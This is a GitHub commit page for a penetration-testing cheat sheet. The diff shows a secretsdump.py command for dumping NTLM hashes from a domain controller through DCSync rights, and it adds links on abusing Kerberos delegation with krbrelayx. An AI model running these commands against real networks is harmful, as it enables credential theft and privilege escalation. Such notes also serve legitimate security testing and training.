Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-07-11 19:45:10 +05:00 committed by GitHub
parent 30fe0f5c90
commit 46e2cf9e54
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -375,6 +375,12 @@ If we find a user having DCsync rights or GetChangeAll privileges meaning to rep
```
python3 secretsdump.py 'DOMAIN/USERNAME':'PASSOWRD'@IP -just-dc-ntlm
```
### Abusing Constrained/Unconstrained Delegations
```
https://cheatsheet.haax.fr/windows-systems/privilege-escalation/delegations/
https://github.com/dirkjanm/krbrelayx
```
# FreeBSD